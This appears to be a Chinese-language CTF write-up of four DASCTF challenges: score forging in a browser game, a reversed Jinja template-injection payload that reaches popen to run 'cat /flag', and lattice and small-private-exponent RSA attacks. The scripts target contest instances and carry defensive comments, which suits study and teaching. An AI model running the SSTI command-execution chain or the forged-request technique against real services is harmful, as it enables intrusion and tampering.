DASCTF九月赛



dino3d

这个题目考察 JS 逆向。游戏角色死亡的时候可以看到,页面给 check.php 发送了分数、checkCode 和 tm 三个参数;再用 F12 可以看到该请求的启动器名为 sn。

image.png

image.png

全局搜索 sn,发现了如下代码:

body:"score=" + parseInt(e).tostring() + "&checkCode" + md5(parseInt(e).tostring() + t) + "&tm=" + (+new Date).tostring().substring(0,10)

image.png

可以看到 checkCode 是分数加盐后的 MD5,然后全局搜索 salt。盐值随前端 JS 一起下发,任何玩家都能读到,所以这个校验码并不能证明分数可信;分数应当由服务端自己计算或校验。

image.png

image.png

得到 t 为 DASxCBCTF_wElc03e

exp 如下:

import requests 
from hashlib import md5
import time 

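# Proof-of-concept for the dino3d challenge: rebuild the form the game's
# client-side JavaScript posts to check.php when a run ends.
url = 'http://node4.buuoj.cn:25475/check.php'
score = '10000'
# The salt was read out of the JavaScript served to every player, so the MD5
# below is not a keyed integrity check: anyone holding the page source can
# compute it. The defensive lesson is that a score reported by the client
# must be recomputed or validated on the server.
salt = "DASxCBCTF_wElc03e"
checkCode = md5((score + salt).encode()).hexdigest()
# Unix time in whole seconds, matching the client's
# (+new Date).toString().substring(0, 10).
tm = str(int(time.time()))
data = {
    'score': score,
    # The original listing referenced an undefined name `checkcode` here.
    'checkCode': checkCode,
    'tm': tm,
}
# The original listing called `request.post`; the imported module is
# `requests`. The timeout keeps the script from hanging on a dead instance.
result = requests.post(url=url, data=data, timeout=10)
print(result.text)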

Text Reverse

输入 { 和 {{,发现被禁用。

image.png

咱们输入测试语句 {if 1=1%} {%print 123%} {%endif%},翻转后为 }fidne%{}%321 tnirp%{ }%1=1 fi{。从下面的 exp 可以看出,提交的文本会先被翻转再交给模板引擎渲染,所以提交的是翻转后的 payload。

image.png exp

import requests

# Proof-of-concept for the "Text Reverse" challenge instance.
# The command to run travels in the `path` query parameter, which the
# template below reads back through `request.args.path`.
target = "http://78fa350f-64ea-4d0b-a24b-4e64be049006.node4.buuoj.cn:81/?path=cat /flag"

# The template uses only {% ... %} statement tags: it walks the subclasses of
# ''.__class__.__mro__[1], picks the class named `_wrap_close`, and reaches
# `popen` through that class's __init__.__globals__.
# Defensive takeaway: a character blocklist on the submitted text does not
# help when the service renders user-controlled text as template source
# (presumably after reversing it, per the challenge name). The robust fix is
# to pass user text to the template only as data, never as the template.
template = (
    "{% for i in ''.__class__.__mro__[1].__subclasses__() %}"
    "{% if i.__name__=='_wrap_close' %}"
    "{% print i.__init__.__globals__['popen'](request.args.path).read() %}"
    "{% endif %}{% endfor %}"
)

# The text is submitted reversed in the `text` form field.
form = {"text": template[::-1]}
response = requests.post(url=target, data=form)
print(response.text)

LittleRSA

import gmpy2, libnum 
# Challenge parameters for LittleRSA, copied verbatim from the task.
# e: public exponent; inverted modulo phi further down to obtain d.
e = 65537
# N: used only as the modulus of the two-row lattice built below
# (rows (1, g % N) and (0, N)); it is not the modulus the ciphertext uses.
N = 19351301035801508116955552063316327463227928638319284082504070745230119792307421099534903837766317639913937954784857576991401214861067471772614753337821871108189780331081099041824669243928056765115068764246765680962348646383991303828426125303844394268682191775232611288039200316595279055408827296256289143602827525373267536643865729646353071637054367702218515803980122435811129935450486950137279824491461041391572264371799797200331838690523349105589985032730668315787318829244743317257793753147209875458127340875400367081865762286565978620979196410411241442894450955280237513249393612603560410291825805553536595543937
# g: reduced modulo N before it goes into the lattice.
# NOTE(review): presumably a hint value published by the challenge that is
# linearly related to a prime factor of n modulo N; the task source is not
# shown on this page, so confirm against it.
g = 101172011079013273946711882340439823149055809449035744718659818796135714101721641190114954130041477714466321498903210220694435354795744225843314447645623337668697058127975104586375292636080114347294697007231487782548846095107329445479367324424672776003899748234353857872627585595343736452088156885081907758727085723312506489549364721644636251780350312413098132506051531311685636921117457469745637347738336829350634994271419554741425590636953154753970902976959308323838617091060754826727417688836026597614894745348808019654100196615719730109909578899299246848916182034705259206906552769087038179288139086772719994577168184701096922291610523676039127012518100023765548552210944426749474888311751069936144583375194023227887848704267587915237057432609663328145608194550736074250822416779448467084842127165553649513397606464059847361880649213934069715996589751778384513724306521043255299443480482640183740131563318058454711913397533436985618182923646192481486120942073719321372236539019107909910597047133371708017755744495134116771999521953654596632221519266339372439452558083199640035069852530373510758859460350025736629801086757717838159774542506755335660607766677992105601518694405113552321342152041808586187181800679845672788746273313
# n: RSA modulus; factored below as p * (n // p) and used for decryption.
n = 90106928919727272173474070618911951313216606598108495724382284361415375454490594410306345748069424740100772955015304592942129026096113424198209327375124576666577469761124470792842854884924199449996929134613382626394351988541980388358156143332979538058465890179760337315789398915560641465656968797050755849799
# c: ciphertext, decrypted below as pow(c, d, n).
c = 51609249982849856103564442566936515708380814106997783395400669324617748952940831076546581735494963467680719842859574144530848473300102236821201997786375946601413660428461473204032985053128283751860315027843200214217715401391736262811016964783589439740884991543059175666298728428567481043422497862838127903980
# Sage script: build the two-row integer lattice with rows (1, g mod N) and
# (0, N), then LLL-reduce it.
basis = matrix([vector(ZZ, [1, g % N]), vector(ZZ, [0, N])]);

# The first row of the reduced basis is treated as a short vector whose second
# coordinate is, up to sign, a prime factor of n.
reduced_rows = basis.LLL()
_s, p = reduced_rows[0]
p = int(abs(p))

# NOTE(review): the script does not check that p actually divides n; if the
# reduction returned something else, the floor division below would silently
# yield a wrong cofactor.
q = n // p

# Textbook RSA decryption with the recovered factors.
phi = (p - 1) * (q - 1)
d = int(gmpy2.invert(e, phi))
m = int(pow(c, d, n))
print(libnum.n2s(m))
# b'CBCTF{L4ttic3_15_6ood_i5n7_it?}' 
# DASCTF{L4ttic3_15_6ood_i5n7_it?}

easyRSA

import logging 
import os 
import sys

from sage.all import RR 
from sage.all import ZZ 
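# Put the directory three levels above this file on sys.path so the
# project-local packages imported right after this (`attacks`, `shared`)
# resolve; presumably that directory is the repository root.
# The original listing had `os.path.abspat h` (a stray space inside the
# identifier) and had lost the indentation under the `if`.
path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(os.path.abspath(__file__)))))
if sys.path[1] != path:
    sys.path.insert(1, path)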
from attacks.factorization import known_phi 
from shared.small_roots import herrmann_may 
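def attack(N, e, factor_bit_length, partial_p=None, delta=0.25, m=1, t=None):
    """
    Recovers the prime factors if the private exponent is too small.
    This implementation exploits knowledge of least significant bits of prime factors, if available.
    More information: Boneh D., Durfee G., "Cryptanalysis of RSA with Private Key d Less than N^0.292"
    :param N: the modulus
    :param e: the public exponent
    :param factor_bit_length: the bit length of the prime factors
    :param partial_p: the partial prime factor p (PartialInteger) (default: None)
    :param delta: a predicted bound on the private exponent (d < N^delta) (default: 0.25)
    :param m: the m value to use for the small roots method (default: 1)
    :param t: the t value to use for the small roots method (default: automatically computed using m)
    :return: a tuple containing the prime factors, or None if no candidate root yields a factorization
    """
    # Use additional information about factors to speed up Boneh-Durfee.
    # Without partial_p both values are 0, so A becomes N + 1 and the constant
    # term of f becomes 1, the same polynomial attack_multi_prime builds.
    p_lsb, p_lsb_bit_length = (0, 0) if partial_p is None else partial_p.get_known_lsb()
    q_lsb = (pow(p_lsb, -1, 2 ** p_lsb_bit_length) * N) % (2 ** p_lsb_bit_length)
    A = ((N >> p_lsb_bit_length) + pow(2, -p_lsb_bit_length, e) * (p_lsb * q_lsb - p_lsb - q_lsb + 1))

    x, y = ZZ["x", "y"].gens()
    f = x * (A + y) + pow(2, -p_lsb_bit_length, e)
    # Bounds handed to the small-roots search for x and y respectively.
    X = int(RR(e) ** delta)
    Y = int(2 ** (factor_bit_length - p_lsb_bit_length + 1))
    t = int((1 - 2 * delta) * m) if t is None else t
    logging.info(f"Trying m = {m}, t = {t}...")
    for x0, y0 in herrmann_may.modular_bivariate(f, e, m, t, X, Y):
        z = int(f(x0, y0))
        # Only candidates at which f vanishes modulo e are considered.
        if z % e == 0:
            k = pow(x0, -1, e)
            s = (N + 1 + k) % e
            # Candidate totient, checked by trying to factor N with it.
            phi = N - s + 1
            factors = known_phi.factorize(N, phi)
            if factors:
                return factors

    return None


def attack_multi_prime(N, e, factor_bit_length, factors, delta=1/6, m=5, t=None):
    """
    Recovers the prime factors if the private exponent is too small.
    This method works for a modulus consisting of any number of primes.
    :param N: the modulus
    :param e: the public exponent
    :param factor_bit_length: the bit length of the prime factors
    :param factors: the number of prime factors in the modulus
    :param delta: a predicted bound on the private exponent (d < n^delta) (default: 1/6)
    :param m: the m value to use for the small roots method (default: 5)
    :param t: the t value to use for the small roots method (default: automatically computed using m)
    :return: a tuple containing the prime factors, or None if no candidate root yields a factorization
    """
    x, y = ZZ["x", "y"].gens()
    A = N + 1
    f = x * (A + y) + 1
    # Bounds handed to the small-roots search for x and y respectively.
    X = int(RR(e) ** delta)
    Y = int(2 ** ((factors - 1) * factor_bit_length + 1))
    t = int((1 - 2 * delta) * m) if t is None else t
    logging.info(f"Trying m = {m}, t = {t}...")
    for x0, y0 in herrmann_may.modular_bivariate(f, e, m, t, X, Y):
        z = int(f(x0, y0))
        # Only candidates at which f vanishes modulo e are considered.
        if z % e == 0:
            k = pow(x0, -1, e)
            s = (N + 1 + k) % e
            # Candidate totient, checked by trying to factor N with it.
            phi = N - s + 1
            # Separate name so the `factors` parameter (a count) is not
            # rebound to the result tuple.
            prime_factors = known_phi.factorize_multi_prime(N, phi)
            if prime_factors:
                return prime_factors

    return None


# Challenge parameters for easyRSA. e is roughly as large as n, which usually
# indicates a key generated with a deliberately small private exponent d: the
# weakness this routine targets. Key generation that fixes a small standard e
# and derives d from it avoids this class of key.
e = 543692319895782434793586873362429927694979810701836714789970907812484502410531778466160541800747280593649956771388714635910591027174563094783670038038010184716677689452322851994224499684261265932205144517234930255520680863639225944193081925826378155392210125821339725503707170148367775432197885080200905199759978521133059068268880934032358791127722994561887633750878103807550657534488433148655178897962564751738161286704558463757099712005140968975623690058829135
n = 836627566032090527121140632018409744681773229395209292887236112065366141357802504651617810307617423900626216577416313395633967979093729729146808472187283672097414226162248255028374822667730942095319401316780150886857701380015637144123656111055773881542557503200322153966380830297951374202391216434278247679934469711771381749572937777892991364186158273504206025260342916835148914378411684678800808038832601224951586507845486535271925600310647409016210737881912119
print(attack_multi_prime(N=n, e=e, factor_bit_length=512, factors=3, delta=1/6))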

output

4 (8797181922083591525585598869778503913911997539940378974707325958639527396727451469978814090844870889686771335713527050632475553144695699501624604807330289,8290840099942727456254459708872784923244718841885065356132486986630137149224154742611300270542946268526451359437629221431798319201519042426698311504716563,11470703595496691682834062401356411311733643785413826934230200844281391022097179984487180779673049269503772546339618911735119713801193135911392977437628317) 

rsa 解密

import gmpy2 
import libnum 
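# Decrypt the easyRSA ciphertext with the three prime factors printed by the
# factoring step above.
c = 262857004135341325365954795119195630698138090729973647118817900621693212191529885499646534515610526918027363734446577563494752228693708806585707918542489830672358210151020370518277425565514835701391091303404848540885538503732425887366285924392127448359616405690101810030200914619945580943356783421516140571033192987307744023953015589089516394737132984255621681367783910322351237287242642322145388520883300325056201966188529192590458358240120864932085960411656176
e = 543692319895782434793586873362429927694979810701836714789970907812484502410531778466160541800747280593649956771388714635910591027174563094783670038038010184716677689452322851994224499684261265932205144517234930255520680863639225944193081925826378155392210125821339725503707170148367775432197885080200905199759978521133059068268880934032358791127722994561887633750878103807550657534488433148655178897962564751738161286704558463757099712005140968975623690058829135
n = 836627566032090527121140632018409744681773229395209292887236112065366141357802504651617810307617423900626216577416313395633967979093729729146808472187283672097414226162248255028374822667730942095319401316780150886857701380015637144123656111055773881542557503200322153966380830297951374202391216434278247679934469711771381749572937777892991364186158273504206025260342916835148914378411684678800808038832601224951586507845486535271925600310647409016210737881912119
p, q, r = (
    8797181922083591525585598869778503913911997539940378974707325958639527396727451469978814090844870889686771335713527050632475553144695699501624604807330289,
    8290840099942727456254459708872784923244718841885065356132486986630137149224154742611300270542946268526451359437629221431798319201519042426698311504716563,
    11470703595496691682834062401356411311733643785413826934230200844281391022097179984487180779673049269503772546339618911735119713801193135911392977437628317,
)

# Check the pasted factors before deriving phi from them: a copy error would
# otherwise produce a wrong d and garbage plaintext with no error raised.
if p * q * r != n:
    raise ValueError("p * q * r does not equal n")

phi = (p - 1) * (q - 1) * (r - 1)
# Built-in modular inverse and int.to_bytes stand in for gmpy2.invert and
# libnum.n2s, so this step needs only the standard library.
d = pow(e, -1, phi)
m = pow(c, d, n)
plaintext = m.to_bytes((m.bit_length() + 7) // 8, "big")
print(plaintext)
# Output recorded in the writeup: b'CBCTF{W13ner_4ttack_ca^_d0_m0r3!}'
# Submitted as: DASCTF{W13ner_4ttack_ca^_d0_m0r3!}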